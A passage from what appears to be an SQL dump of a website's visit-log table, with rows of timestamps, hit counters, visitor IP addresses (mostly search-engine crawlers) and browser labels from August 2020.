,'66.249.70.80','chrome'),(531253,1597303850,8,8,0,0,'109.108.71.11','other'),(531254,1597303860,2,2,0,0,'66.249.70.78','chrome'),(531255,1597303883,1,1,0,0,'207.46.13.7','other'),(531256,1597304475,1,1,0,0,'46.133.192.37','chrome'),(531257,1597304617,1,1,0,0,'66.249.64.60','chrome'),(531258,1597304755,1,1,0,0,'66.249.70.76','chrome'),(531259,1597304810,1,1,0,0,'66.249.70.80','chrome'),(531260,1597304934,8,8,0,0,'109.108.71.11','other'),(531261,1597305229,1,1,0,0,'66.249.64.56','chrome'),(531262,1597305360,2,2,0,0,'66.249.70.78','chrome'),(531263,1597305371,1,1,0,0,'66.249.64.58','chrome'),(531264,1597306010,8,8,0,0,'109.108.71.11','other'),(531265,1597306266,1,1,0,0,'176.111.33.18','firefox'),(531266,1597306346,1,1,0,0,'66.249.64.60','chrome'),(531267,1597306781,1,1,0,0,'157.55.39.175','other'),(531268,1597307028,2,2,0,0,'66.249.70.76','chrome'),(531269,1597307135,1,1,0,0,'178.95.156.86','chrome'),(531270,1597307148,8,8,0,0,'109.108.71.11','other'),(531271,1597307213,1,1,0,0,'66.249.70.80','chrome'),(531272,1597307773,1,1,0,0,'91.196.178.68','firefox'),(531273,1597308022,1,1,0,0,'66.249.64.60','chrome'),(531274,1597308251,8,8,0,0,'109.108.71.11','other'),(531275,1597308275,3,3,0,0,'66.249.70.76','chrome'),(531276,1597308292,3,3,0,0,'66.249.70.78','chrome'),(531277,1597308503,1,1,0,0,'178.95.156.86','chrome'),(531278,1597308777,2,2,0,0,'66.249.70.80','chrome'),(531279,1597309113,1,1,0,0,'8.29.198.26','other'),(531280,1597309177,1,1,0,0,'66.249.70.76','chrome'),(531281,1597309345,8,8,0,0,'109.108.71.11','other'),(531282,1597309405,1,1,0,0,'195.10.210.70','chrome'),(531283,1597310305,1,1,0,0,'66.249.64.56','chrome'),(531284,1597310383,2,2,0,0,'91.196.178.180','chrome'),(531285,1597310460,8,8,0,0,'109.108.71.11','other'),(531286,1597310588,1,1,0,0,'66.249.70.80','chrome'),(531287,1597310607,1,1,0,0,'91.196.178.68','chrome'),(531288,1597311084,1,1,0,0,'18.216.240.200','chrome'),(531289,1597311133,1,1,0,0,'66.249.70.76','chrome'),(531290,1597311584,8,8,0,0,'109.108.71.11','other'),(531291,1597311615,1,1,0,0,'176.120.118.67','chrome'),(531292,1597311820,2,2,0,0,'66.249.70.80','chrome'),(531293,1597312054,2,2,0,0,'66.249.64.58','chrome'),(531294,1597312095,2,2,0,0,'66.249.70.78','chrome'),(531295,1597312271,1,1,0,0,'207.46.13.119','other'),(531296,1597312395,2,2,0,0,'66.249.64.60','chrome'),(531297,1597312458,1,1,0,0,'95.220.198.252','chrome'),(531298,1597312460,1,1,0,0,'192.186.145.58','chrome'),(531299,1597312708,8,8,0,0,'109.108.71.11','other'),(531300,1597313008,2,2,0,0,'66.249.70.80','chrome'),(531301,1597313010,1,1,0,0,'207.46.13.7','other'),(531302,1597313264,1,1,0,0,'157.55.39.190','other'),(531303,1597313781,2,2,0,0,'66.249.70.78','chrome'),(531304,1597313850,8,8,0,0,'109.108.71.11','other'),(531305,1597313889,1,1,0,0,'213.159.213.137','other'),(531306,1597313918,2,2,0,0,'66.249.70.80','chrome'),(531307,1597314143,1,1,0,0,'184.94.240.92','firefox'),(531308,1597314526,1,1,0,0,'130.180.220.123','chrome'),(531309,1597314814,1,1,0,0,'66.249.70.78','chrome'),(531310,1597314976,8,8,0,0,'109.108.71.11','other'),(531311,1597315179,4,4,0,0,'66.249.70.80','chrome'),(531312,1597315185,2,2,0,0,'66.249.70.76','chrome'),(531313,1597315375,1,1,0,0,'31.13.127.6','other'),(531314,1597315768,2,2,0,0,'66.249.70.78','chrome'),(531315,1597315940,1,1,0,0,'157.55.39.55','other'),(531316,1597316078,8,8,0,0,'109.108.71.11','other'),(531317,1597316836,2,2,0,0,'66.249.70.78','chrome'),(531318,1597316939,1,1,0,0,'66.249.70.76','chrome'),(531319,1597317086,1,1,0,0,'157.55.39.55','other'),(531320,1597317171,1,1,0,0,'109.74.154.72','chrome'),(531321,1597317224,8,8,0,0,'109.108.71.11','other'),(531322,1597317928,1,1,0,0,'66.249.70.78','chrome'),(531323,1597318154,1,1,0,0,'66.249.70.80','chrome'),(531324,1597318347,8,8,0,0,'109.108.71.11','other'),(531325,1597318943,1,1,0,0,'178.95.156.86','chrome'),(531326,1597319041,1,1,0,0,'66.249.70.76','chrome'),(531327,1597319380,1,1,0,0,'66.249.70.80','chrome'),(531328,1597319469,8,8,0,0,'109.108.71.11','other'),(531329,1597319556,1,1,0,0,'66.249.70.78','chrome'),(531330,1597319562,1,1,0,0,'91.196.178.72','chrome'),(531331,1597319943,1,1,0,0,'8.29.198.26','other'),(531332,1597319958,2,2,0,0,'66.249.70.76','chrome'),(531333,1597320591,8,8,0,0,'109.108.71.11','other'),(531334,1597320607,1,1,0,0,'46.219.206.89','firefox'),(531335,1597320948,1,1,0,0,'37.73.154.24','chrome'),(531336,1597321149,1,1,0,0,'157.55.39.175','other'),(531337,1597321276,1,1,0,0,'66.249.70.76','chrome'),(531338,1597321715,2,2,0,0,'66.249.70.80','chrome'),(531339,1597321749,8,8,0,0,'109.108.71.11','other'),(531340,1597322195,1,1,0,0,'66.249.70.78','chrome'),(531341,1597322557,1,1,0,0,'91.196.178.84','chrome'),(531342,1597322582,1,1,0,0,'66.249.64.60','chrome'),(531343,1597322609,1,1,0,0,'66.249.70.76','chrome'),(531344,1597322673,1,1,0,0,'207.46.13.60','other'),(531345,1597322881,8,8,0,0,'109.108.71.11','other'),(531346,1597323459,2,2,0,0,'66.249.70.80','chrome'),(531347,1597323495,1,1,0,0,'157.55.39.230','other'),(531348,1597323944,1,1,0,0,'66.249.64.60','chrome'),(531349,1597323997,8,8,0,0,'109.108.71.11','other'),(531350,1597324285,2,2,0,0,'66.249.70.78','chrome'),(531351,1597324322,1,1,0,0,'91.196.178.84','chrome'),(531352,1597324679,1,1,0,0,'91.196.178.72','chrome'),(531353,1597324769,1,1,0,0,'66.249.70.80','chrome'),(531354,1597324896,1,1,0,0,'178.154.200.51','other'),(531355,1597325004,1,1,0,0,'66.249.70.76','chrome'),(531356,1597325095,8,8,0,0,'109.108.71.11','other'),(531357,1597325201,1,1,0,0,'95.220.198.252','firefox'),(531358,1597325204,1,1,0,0,'192.186.157.106','firefox'),(531359,1597325620,1,1,0,0,'194.0.56.185','chrome'),(531360,1597325715,1,1,0,0,'91.196.178.72','chrome'),(531361,1597326182,8,8,0,0,'109.108.71.11','other'),(531362,1597326284,1,1,0,0,'66.249.70.76','chrome'),(531363,1597326848,1,1,0,0,'66.249.70.80','chrome'),(531364,1597327311,8,8,0,0,'109.108.71.11','other'),(531365,1597327521,1,1,0,0,'66.249.70.76','chrome'),(531366,1597328080,1,1,0,0,'51.77.52.160','chrome'),(531367,1597328418,8,8,0,0,'109.108.71.11','other'),(531368,1597328475,1,1,0,0,'5.45.207.174','other'),(531369,1597328815,1,1,0,0,'66.249.64.56','chrome'),(531370,1597328875,1,1,0,0,'37.73.154.24','chrome'),(531371,1597329510,1,0,1,0,'66.249.70.76',''),(531372,1597329540,8,8,0,0,'109.108.71.11','other'),(531373,1597329589,1,1,0,0,'66.249.70.76','chrome'),(531374,1597330126,1,1,0,0,'66.249.64.60','chrome'),(531375,1597330296,2,2,0,0,'66.249.70.80','chrome'),(531376,1597330438,1,1,0,0,'157.55.39.215','other'),(531377,1597330650,8,8,0,0,'109.108.71.11','other'),(531378,1597330678,1,1,0,0,'157.55.39.245','other'),(531379,1597330705,1,1,0,0,'17.58.99.7','other'),(531380,1597330778,1,1,0,0,'8.29.198.27','other'),(531381,1597330992,4,4,0,0,'88.99.2.203','other'),(531382,1597331446,1,1,0,0,'207.46.13.7','other'),(531383,1597331612,2,2,0,0,'5.45.207.174','other'),(531384,1597331738,8,8,0,0,'109.108.71.11','other'),(531385,1597331897,1,1,0,0,'88.99.2.203','other'),(531386,1597332309,1,1,0,0,'84.17.62.231','msie'),(531387,1597332433,1,1,0,0,'157.55.39.95','other'),(531388,1597332567,1,1,0,0,'66.249.70.78','chrome'),(531389,1597332609,1,1,0,0,'157.55.39.175','other'),(531390,1597332733,1,1,0,0,'17.58.99.7','other'),(531391,1597332865,8,8,0,0,'109.108.71.11','other'),(531392,1597333214,1,1,0,0,'5.45.207.174','other'),(531393,1597333969,8,8,0,0,'109.108.71.11','other'),(531394,1597334792,1,1,0,0,'95.220.198.252','chrome'),(531395,1597334795,1,1,0,0,'192.241.80.31','chrome'),(531396,1597335065,8,8,0,0,'109.108.71.11','other'),(531397,1597335101,2,2,0,0,'178.154.200.112','other'),(531398,1597335496,2,2,0,0,'66.249.70.76','chrome'),(531399,1597336022,1,1,0,0,'157.55.39.238','other'),(531400,1597336196,8,8,0,0,'109.108.71.11','other'),(531401,1597336430,3,3,0,0,'66.249.70.80','chrome'),(531402,1597336439,1,1,0,0,'66.249.70.78','chrome'),(531403,1597336773,1,1,0,0,'157.55.39.175','other'),(531404,1597337285,8,8,0,0,'109.108.71.11','other'),(531405,1597337320,1,1,0,0,'5.45.207.174','other'),(531406,1597337589,1,1,0,0,'66.249.70.76','chrome'),(531407,1597337820,1,1,0,0,'66.249.70.78','chrome'),(531408,1597338146,1,1,0,0,'66.249.64.60','chrome'),(531409,1597338373,8,8,0,0,'109.108.71.11','other'),(531410,1597338517,2,2,0,0,'66.249.70.80','chrome'),(531411,1597339041,1,0,1,0,'66.249.70.76',''),(531412,1597339258,1,0,1,0,'66.249.64.60',''),(531413,1597339489,8,8,0,0,'109.108.71.11','other'),(531414,1597339546,1,1,0,0,'5.255.253.69','other'),(531415,1597339628,1,1,0,0,'88.155.106.248','chrome'),(531416,1597339812,1,1,0,0,'66.249.70.78','chrome'),(531417,1597340570,8,8,0,0,'109.108.71.11','other'),(531418,1597341103,4,4,0,0,'66.249.70.78','chrome'),(531419,1597341605,1,1,0,0,'66.249.70.80','chrome'),(531420,1597341623,1,1,0,0,'8.29.198.25','other'),(531421,1597341629,1,1,0,0,'66.249.64.58','chrome'),(531422,1597341674,8,8,0,0,'109.108.71.11','other'),(531423,1597341705,1,1,0,0,'66.249.70.76','chrome'),(531424,1597342579,1,1,0,0,'192.71.126.175','other'),(531425,1597342594,1,1,0,0,'91.196.178.1','chrome'),(531426,1597342790,8,8,0,0,'109.108.71.11','other'),(531427,1597343988,8,8,0,0,'109.108.71.11','other'),(531428,1597344786,1,1,0,0,'157.55.39.175','other'),(531429,1597345122,8,8,0,0,'109.108.71.11','other'),(531430,1597346336,8,8,0,0,'109.108.71.11','other'),(531431,1597346964,1,1,0,0,'173.252.111.21','other'),(531432,1597346965,1,1,0,0,'173.252.111.5','other'),(531433,1597347038,1,1,0,0,'66.249.70.76','chrome'),(531434,1597347450,8,8,0,0,'109.108.71.11','other'),(531435,1597347937,1,1,0,0,'66.249.70.80','chrome'),(531436,1597347961,1,1,0,0,'66.249.70.76','chrome'),(531437,1597348563,8,8,0,0,'109.108.71.11','other'),(531438,1597348694,2,2,0,0,'66.249.70.78','chrome'),(531439,1597349269,2,2,0,0,'66.249.64.58','chrome'),(531440,1597349825,2,2,0,0,'66.249.70.80','chrome'),(531441,1597349842,8,8,0,0,'109.108.71.11','other'),(531442,1597351209,8,8,0,0,'109.108.71.11','other'),(531443,1597351236,1,1,0,0,'66.249.70.78','chrome'),(531444,1597352094,2,2,0,0,'66.249.70.80','chrome'),(531445,1597352225,1,1,0,0,'5.45.207.75','other'),(531446,1597352450,1,1,0,0,'8.29.198.26','other'),(531447,1597352513,8,8,0,0,'109.108.71.11','other'),(531448,1597352520,1,1,0,0,'66.249.70.76','chrome'),(531449,1597353410,1,1,0,0,'66.249.64.60','chrome'),(531450,1597353478,1,1,0,0,'66.249.70.80','chrome'),(531451,1597353753,8,8,0,0,'109.108.71.11','other'),(531452,1597354036,1,1,0,0,'2.47.39.216','other'),(531453,1597354241,1,1,0,0,'66.249.70.94','chrome'),(531454,1597354289,1,1,0,0,'94.153.27.16','chrome'),(531455,1597354444,2,2,0,0,'5.45.207.174','other'),(531456,1597354958,8,8,0,0,'109.108.71.11','other'),(531457,1597355173,1,1,0,0,'66.249.64.56','chrome'),(531458,1597355900,1,1,0,0,'66.249.64.58','chrome'),(531459,1597355917,2,2,0,0,'66.249.70.80','chrome'),(531460,1597356225,8,8,0,0,'109.108.71.11','other'),(531461,1597356516,1,1,0,0,'173.252.111.112','other'),(531462,1597356633,1,1,0,0,'173.252.111.5','other'),(531463,1597356634,1,1,0,0,'173.252.111.11','other'),(531464,1597356641,1,1,0,0,'173.252.111.9','other'),(531465,1597356642,1,1,0,0,'173.252.111.16','other'),(531466,1597356680,1,1,0,0,'173.252.111.19','other'),(531467,1597357452,8,8,0,0,'109.108.71.11','other'),(531468,1597357655,1,1,0,0,'5.45.207.174','other'),(531469,1597357865,1,1,0,0,'66.249.64.58','chrome'),(531470,1597357943,1,1,0,0,'157.55.39.95','other'),(531471,1597358694,8,8,0,0,'109.108.71.11','other'),(531472,1597358771,1,1,0,0,'209.17.96.154','other'),(531473,1597358777,1,1,0,0,'66.249.70.78','chrome'),(531474,1597359274,1,1,0,0,'157.55.39.121','other'),(531475,1597359805,1,1,0,0,'66.249.70.80','chrome'),(531476,1597359856,1,1,0,0,'95.220.198.252','chrome'),(531477,1597359859,1,1,0,0,'198.23.217.200','chrome'),(531478,1597359960,1,1,0,0,'66.249.64.60','chrome'),(531479,1597359980,8,8,0,0,'109.108.71.11','other'),(531480,1597359989,1,1,0,0,'94.130.9.183','other'),(531481,1597360027,2,2,0,0,'157.55.39.168','other'),(531482,1597360088,1,1,0,0,'66.249.70.78','chrome'),(531483,1597361087,1,1,0,0,'207.46.13.101','other'),(531484,1597361184,8,8,0,0,'109.108.71.11','other'),(531485,1597361424,1,1,0,0,'66.249.70.80','chrome'),(531486,1597361605,1,1,0,0,'95.220.198.252','firefox'),(531487,1597361607,1,1,0,0,'104.168.99.116','firefox'),(531488,1597361820,1,1,0,0,'178.154.200.112','other'),(531489,1597362368,8,8,0,0,'109.108.71.11','other'),(531490,1597362456,1,1,0,0,'5.45.207.92','other'),(531491,1597362469,1,1,0,0,'66.249.70.80','chrome'),(531492,1597362737,2,2,0,0,'157.55.39.121','other'),(531493,1597362907,1,1,0,0,'62.205.134.182','other'),(531494,1597363281,1,1,0,0,'8.29.198.26','other'),(531495,1597363477,1,1,0,0,'66.249.64.56','chrome'),(531496,1597363567,8,8,0,0,'109.108.71.11','other'),(531497,1597363771,1,1,0,0,'66.249.64.60','chrome'),(531498,1597363834,1,1,0,0,'66.249.70.76','chrome'),(531499,1597363893,1,1,0,0,'5.255.253.136','other'),(531500,1597364698,8,8,0,0,'109.108.71.11','other'),(531501,1597364940,1,1,0,0,'157.55.39.168','other'),(531502,1597365671,1,1,0,0,'66.249.70.80','chrome'),(531503,1597365903,8,8,0,0,'109.108.71.11','other'),(531504,1597366154,1,1,0,0,'157.55.39.147','other'),(531505,1597366546,1,1,0,0,'207.46.13.205','other'),(531506,1597367056,1,1,0,0,'66.249.70.76','chrome'),(531507,1597367092,8,8,0,0,'109.108.71.11','other'),(531508,1597367671,1,1,0,0,'66.249.70.80','chrome'),(531509,1597368258,8,8,0,0,'109.108.71.11','other'),(531510,1597368562,1,1,0,0,'5.255.253.144','other'),(531511,1597368891,1,1,0,0,'178.154.200.112','other'),(531512,1597368900,1,1,0,0,'207.46.13.83','other'),(531513,1597369462,8,8,0,0,'109.108.71.11','other'),(531514,1597370182,1,1,0,0,'157.55.39.95','other'),(531515,1597370227,1,1,0,0,'66.249.70.80','chrome'),(531516,1597370608,8,8,0,0,'109.108.71.11','other'),(531517,1597371441,1,1,0,0,'66.249.70.78','chrome'),(531518,1597371767,8,8,0,0,'109.108.71.11','other'),(531519,1597372056,1,1,0,0,'66.249.70.76','chrome'),(531520,1597372512,1,1,0,0,'66.249.70.78','chrome'),(531521,1597372999,8,8,0,0,'109.108.71.11','other'),(531522,1597374116,1,1,0,0,'8.29.198.27','other'),(531523,1597374190,8,8,0,0,'109.108.71.11','other'),(531524,1597374596,1,1,0,0,'66.249.70.80','chrome'),(531525,1597374715,2,2,0,0,'66.249.70.76','chrome'),(531526,1597374913,1,1,0,0,'5.45.207.92','other'),(531527,1597375279,1,1,0,0,'65.132.59.34','other'),(531528,1597375387,8,8,0,0,'109.108.71.11','other'),(531529,1597375987,1,1,0,0,'5.44.169.215','chrome'),(531530,1597376564,8,8,0,0,'109.108.71.11','other'),(531531,1597376892,1,1,0,0,'31.13.115.10','other'),(531532,1597377238,1,1,0,0,'207.46.13.111','other'),(531533,1597377336,1,1,0,0,'31.13.115.19','other'),(531534,1597377729,8,8,0,0,'109.108.71.11','other'),(531535,1597378108,1,1,0,0,'138.246.253.15','chrome'),(531536,1597378647,1,1,0,0,'178.154.200.51','other'),(531537,1597378692,1,1,0,0,'157.55.39.158','other'),(531538,1597378848,1,1,0,0,'66.249.70.80','chrome'),(531539,1597379745,1,1,0,0,'91.206.33.111','chrome'),(531540,1597380022,8,8,0,0,'109.108.71.11','other'),(531541,1597380043,1,1,0,0,'131.220.6.152','chrome'),(531542,1597380729,1,1,0,0,'157.55.39.147','other'),(531543,1597380860,1,1,0,0,'178.154.200.51','other'),(531544,1597380962,3,3,0,0,'66.249.70.78','chrome'),(531545,1597381013,1,1,0,0,'62.205.134.182','other'),(531546,1597381126,2,2,0,0,'66.249.70.80','chrome'),(531547,1597381223,8,8,0,0,'109.108.71.11','other'),(531548,1597381714,1,1,0,0,'66.249.64.56','chrome'),(531549,1597381824,1,1,0,0,'66.249.64.60','chrome'),(531550,1597381884,1,1,0,0,'157.55.39.56','other'),(531551,1597382205,1,1,0,0,'66.249.70.78','chrome'),(531552,1597382276,1,1,0,0,'207.46.13.98','other'),(531553,1597382412,8,8,0,0,'109.108.71.11','other'),(531554,1597382523,1,1,0,0,'207.46.13.83','other'),(531555,1597382851,2,2,0,0,'66.249.70.80','chrome'),(531556,1597382917,2,2,0,0,'66.249.64.58','chrome'),(531557,1597382926,2,2,0,0,'66.249.70.76','chrome'),(531558,1597383596,8,8,0,0,'109.108.71.11','other'),(531559,1597383634,1,1,0,0,'66.249.64.60','chrome'),(531560,1597383855,1,1,0,0,'66.249.70.78','chrome'),(531561,1597384698,4,4,0,0,'66.249.70.80','chrome'),(531562,1597384711,5,5,0,0,'66.249.70.76','chrome'),(531563,1597384776,8,8,0,0,'109.108.71.11','other'),(531564,1597384949,1,1,0,0,'8.29.198.25','other'),(531565,1597384999,2,2,0,0,'66.249.70.78','chrome'),(531566,1597385552,1,1,0,0,'66.249.64.60','chrome'),(531567,1597385935,8,8,0,0,'109.108.71.11','other'),(531568,1597386324,1,1,0,0,'5.45.207.174','other'),(531569,1597386340,1,1,0,0,'185.30.202.83','chrome'),(531570,1597386406,2,2,0,0,'66.249.70.78','chrome'),(531571,1597386534,1,1,0,0,'66.249.70.80','chrome'),(531572,1597387081,1,1,0,0,'91.196.178.156','chrome'),(531573,1597387104,8,8,0,0,'109.108.71.11','other'),(531574,1597387118,1,1,0,0,'91.196.178.72','chrome'),(531575,1597387437,1,1,0,0,'66.249.70.80','chrome'),(531576,1597387711,2,2,0,0,'66.249.64.56','chrome'),(531577,1597388287,8,8,0,0,'109.108.71.11','other'),(531578,1597388355,6,6,0,0,'66.249.70.76','chrome'),(531579,1597388641,1,1,0,0,'157.55.39.230','other'),(531580,1597388669,1,1,0,0,'17.58.99.84','other'),(531581,1597388671,1,1,0,0,'66.249.70.78','chrome'),(531582,1597388836,1,1,0,0,'95.220.198.252','chrome'),(531583,1597388972,1,1,0,0,'157.55.39.175','other'),(531584,1597389198,2,2,0,0,'66.249.70.80','chrome'),(531585,1597389258,2,2,0,0,'66.249.64.58','chrome'),(531586,1597389523,8,8,0,0,'109.108.71.11','other'),(531587,1597389670,2,2,0,0,'66.249.70.76','chrome'),(531588,1597389927,1,1,0,0,'91.196.178.23','chrome'),(531589,1597390242,3,3,0,0,'66.249.70.78','chrome'),(531590,1597390513,2,2,0,0,'66.249.70.80','chrome'),(531591,1597390778,8,8,0,0,'109.108.71.11','other'),(531592,1597390871,1,1,0,0,'91.196.178.72','chrome'),(531593,1597390931,2,1,1,0,'66.249.70.76',''),(531594,1597391741,1,1,0,0,'207.46.13.36','other'),(531595,1597391792,1,1,0,0,'66.249.64.60','chrome'),(531596,1597392020,8,8,0,0,'109.108.71.11','other'),(531597,1597392105,1,1,0,0,'5.255.253.183','other'),(531598,1597392154,1,1,0,0,'178.154.200.112','other'),(531599,1597392589,1,1,0,0,'157.55.39.56','other'),(531600,1597392695,3,3,0,0,'66.249.70.78','chrome'),(531601,1597392760,1,1,0,0,'157.55.39.175','other'),(531602,1597392911,1,1,0,0,'91.196.178.72','chrome'),(531603,1597393144,1,1,0,0,'77.111.244.22','chrome'),(531604,1597393285,8,8,0,0,'109.108.71.11','other'),(531605,1597394115,4,4,0,0,'66.249.70.80','chrome'),(531606,1597394211,1,1,0,0,'37.73.198.19','chrome'),(531607,1597394361,1,1,0,0,'92.112.152.158','chrome'),(531608,1597394388,1,1,0,0,'157.55.39.230','other'),(531609,1597394631,8,8,0,0,'109.108.71.11','other'),(531610,1597394803,1,1,0,0,'207.46.13.36','other'),(531611,1597395133,1,1,0,0,'92.112.104.211','chrome'),(531612,1597395526,2,2,0,0,'66.249.70.76','chrome'),(531613,1597395580,1,1,0,0,'66.249.64.56','chrome'),(531614,1597395791,1,1,0,0,'8.29.198.27','other'),(531615,1597395916,8,8,0,0,'109.108.71.11','other'),(531616,1597396350,1,1,0,0,'207.46.13.111','other'),(531617,1597396394,1,1,0,0,'5.45.207.174','other'),(531618,1597396639,1,1,0,0,'31.13.127.116','other'),(531619,1597396835,2,2,0,0,'157.55.39.84','other'),(531620,1597396966,2,2,0,0,'66.249.70.76','chrome'),(531621,1597396969,2,2,0,0,'66.249.70.80','chrome'),(531622,1597397227,8,8,0,0,'109.108.71.11','other'),(531623,1597397426,1,1,0,0,'66.249.64.58','chrome'),(531624,1597397435,1,1,0,0,'66.249.70.78','chrome'),(531625,1597397927,1,1,0,0,'207.46.13.24','other'),(531626,1597398421,1,1,0,0,'66.249.70.76','chrome'),(531627,1597398852,1,1,0,0,'157.55.39.230','other'),(531628,1597398911,8,8,0,0,'109.108.71.11','other'),(531629,1597398968,1,1,0,0,'5.45.207.174','other'),(531630,1597399037,1,1,0,0,'157.55.39.147','other'),(531631,1597399167,1,1,0,0,'178.154.200.51','other'),(531632,1597399446,1,1,0,0,'66.249.64.56','chrome'),(531633,1597400185,1,1,0,0,'5.45.207.174','other'),(531634,1597400236,1,1,0,0,'66.249.70.80','chrome'),(531635,1597400368,8,8,0,0,'109.108.71.11','other'),(531636,1597400891,2,2,0,0,'91.196.178.156','chrome'),(531637,1597401072,3,3,0,0,'157.55.39.168','other'),(531638,1597401122,1,1,0,0,'37.73.201.68','chrome'),(531639,1597401287,1,1,0,0,'18.208.126.43','chrome'),(531640,1597401317,1,1,0,0,'66.249.64.60','chrome'),(531641,1597401603,8,8,0,0,'109.108.71.11','other'),(531642,1597401932,1,1,0,0,'66.249.70.76','chrome'),(531643,1597402055,1,1,0,0,'157.55.39.121','other'),(531644,1597402259,3,3,0,0,'66.249.70.78','chrome'),(531645,1597402326,2,2,0,0,'66.249.70.80','chrome'),(531646,1597402644,1,1,0,0,'31.13.103.13','other'),(531647,1597402793,8,8,0,0,'109.108.71.11','other'),(531648,1597402819,1,1,0,0,'5.255.253.183','other'),(531649,1597403057,1,1,0,0,'178.154.200.51','other'),(531650,1597403210,1,1,0,0,'188.170.76.116','other'),(531651,1597403674,1,1,0,0,'109.74.154.72','chrome'),(531652,1597403806,1,1,0,0,'91.196.178.184','chrome'),(531653,1597404069,1,1,0,0,'66.249.64.60','chrome'),(531654,1597404100,8,8,0,0,'109.108.71.11','other'),(531655,1597404321,1,1,0,0,'66.249.70.78','chrome'),(531656,1597404572,1,1,0,0,'207.46.13.24','other'),(531657,1597404659,1,1,0,0,'157.55.39.121','other'),(531658,1597404903,1,1,0,0,'157.55.39.230','other'),(531659,1597405400,8,8,0,0,'109.108.71.11','other'),(531660,1597405507,1,1,0,0,'66.249.64.58','chrome'),(531661,1597405527,1,1,0,0,'5.45.207.92','other'),(531662,1597405689,1,1,0,0,'207.46.13.24','other'),(531663,1597406055,1,1,0,0,'37.73.201.68','chrome'),(531664,1597406153,1,1,0,0,'66.249.70.80','chrome'),(531665,1597406329,2,2,0,0,'91.196.178.58','chrome'),(531666,1597406610,8,8,0,0,'109.108.71.11','other'),(531667,1597406627,1,1,0,0,'8.29.198.26','other'),(531668,1597406643,1,1,0,0,'91.196.178.72','chrome'),(531669,1597406763,2,2,0,0,'66.249.70.76','chrome'),(531670,1597406868,1,1,0,0,'207.46.13.24','other'),(531671,1597406908,1,1,0,0,'157.55.39.168','other'),(531672,1597407082,1,1,0,0,'178.167.78.211','chrome'),(531673,1597407167,1,1,0,0,'66.249.70.78','chrome'),(531674,1597407273,1,1,0,0,'178.154.200.48','other'),(531675,1597407607,1,1,0,0,'66.249.70.80','chrome'),(531676,1597407852,8,8,0,0,'109.108.71.11','other'),(531677,1597408118,1,1,0,0,'66.249.64.56','chrome'),(531678,1597408373,3,3,0,0,'66.249.70.76','chrome'),(531679,1597408901,1,1,0,0,'91.196.178.72','chrome'),(531680,1597409114,8,8,0,0,'109.108.71.11','other'),(531681,1597409160,1,1,0,0,'66.249.64.56','chrome'),(531682,1597409310,2,2,0,0,'66.249.70.78','chrome'),(531683,1597409941,1,1,0,0,'185.46.148.2','firefox'),(531684,1597410216,1,1,0,0,'157.55.39.84','other'),(531685,1597410304,8,8,0,0,'109.108.71.11','other'),(531686,1597410413,1,1,0,0,'66.249.64.58','chrome'),(531687,1597410527,2,2,0,0,'66.249.70.78','chrome'),(531688,1597410571,2,2,0,0,'66.249.70.76','chrome'),(531689,1597410629,1,1,0,0,'37.73.19.93','chrome'),(531690,1597411136,1,1,0,0,'5.45.207.92','other'),(531691,1597411358,1,1,0,0,'3.228.220.31','other'),(531692,1597411521,8,8,0,0,'109.108.71.11','other'),(531693,1597411533,1,1,0,0,'178.154.200.28','other'),(531694,1597411602,2,2,0,0,'66.249.70.80','chrome'),(531695,1597411682,1,1,0,0,'66.249.64.60','chrome'),(531696,1597412068,1,1,0,0,'91.196.178.33','chrome'),(531697,1597412553,1,1,0,0,'5.255.253.88','other'),(531698,1597412692,8,8,0,0,'109.108.71.11','other'),(531699,1597412753,2,2,0,0,'66.249.70.76','chrome'),(531700,1597412757,1,1,0,0,'66.249.70.78','chrome'),(531701,1597412955,2,2,0,0,'3.228.220.31','other'),(531702,1597413634,1,1,0,0,'157.55.39.147','other'),(531703,1597413882,8,8,0,0,'109.108.71.11','other'),(531704,1597413961,2,2,0,0,'66.249.70.80','chrome'),(531705,1597414114,4,4,0,0,'66.249.70.76','chrome'),(531706,1597414758,2,2,0,0,'66.249.70.78','chrome'),(531707,1597415068,1,1,0,0,'66.249.64.56','chrome'),(531708,1597415127,8,8,0,0,'109.108.71.11','other'),(531709,1597415639,1,1,0,0,'66.249.70.80','chrome'),(531710,1597415694,1,1,0,0,'66.249.70.76','chrome'),(531711,1597415862,1,1,0,0,'3.228.220.31','other'),(531712,1597416275,8,8,0,0,'109.108.71.11','other'),(531713,1597416859,1,1,0,0,'157.55.39.84','other'),(531714,1597417432,8,8,0,0,'109.108.71.11','other'),(531715,1597417456,1,1,0,0,'8.29.198.27','other'),(531716,1597418242,1,1,0,0,'207.46.13.111','other'),(531717,1597418341,1,1,0,0,'207.46.13.24','other'),(531718,1597418571,8,8,0,0,'109.108.71.11','other'),(531719,1597419733,1,1,0,0,'157.55.39.175','other'),(531720,1597419750,8,8,0,0,'109.108.71.11','other'),(531721,1597419874,1,1,0,0,'66.249.70.78','chrome'),(531722,1597419980,1,1,0,0,'207.46.13.36','other'),(531723,1597420101,1,1,0,0,'157.55.39.121','other'),(531724,1597420952,8,8,0,0,'109.108.71.11','other'),(531725,1597421478,1,1,0,0,'131.220.6.156','chrome'),(531727,1597421892,1,1,0,0,'157.55.39.95','other'),(531728,1597422188,8,8,0,0,'109.108.71.11','other'),(531729,1597422456,1,1,0,0,'17.58.99.7','other'),(531730,1597423008,3,3,0,0,'66.249.70.80','chrome'),(531731,1597423015,3,3,0,0,'66.249.70.78','chrome'),(531732,1597423385,8,8,0,0,'109.108.71.11','other'),(531733,1597423417,2,2,0,0,'66.249.64.58','chrome'),(531734,1597423592,1,1,0,0,'91.196.178.156','chrome'),(531735,1597423709,4,4,0,0,'66.249.70.76','chrome'),(531736,1597424056,2,2,0,0,'66.249.70.80','chrome'),(531737,1597424576,8,8,0,0,'109.108.71.11','other'),(531738,1597425013,1,1,0,0,'66.249.70.80','chrome'),(531739,1597425368,1,1,0,0,'66.249.70.76','chrome'),(531740,1597425371,1,1,0,0,'66.249.70.78','chrome'),(531741,1597425720,8,8,0,0,'109.108.71.11','other'),(531742,1597426522,2,2,0,0,'66.249.70.76','chrome'),(531743,1597426530,2,2,0,0,'66.249.70.78','chrome'),(531744,1597426533,1,1,0,0,'66.249.64.56','chrome'),(531745,1597426686,2,2,0,0,'66.249.70.80','chrome'),(531746,1597426694,1,1,0,0,'91.196.178.179','chrome'),(531747,1597426879,8,8,0,0,'109.108.71.11','other'),(531748,1597427320,1,1,0,0,'157.55.39.147','other'),(531749,1597427525,1,1,0,0,'5.255.253.69','other'),(531750,1597427533,3,3,0,0,'66.249.70.76','chrome'),(531751,1597427896,2,2,0,0,'66.249.70.78','chrome'),(531752,1597427910,1,1,0,0,'207.46.13.83','other'),(531753,1597428036,8,8,0,0,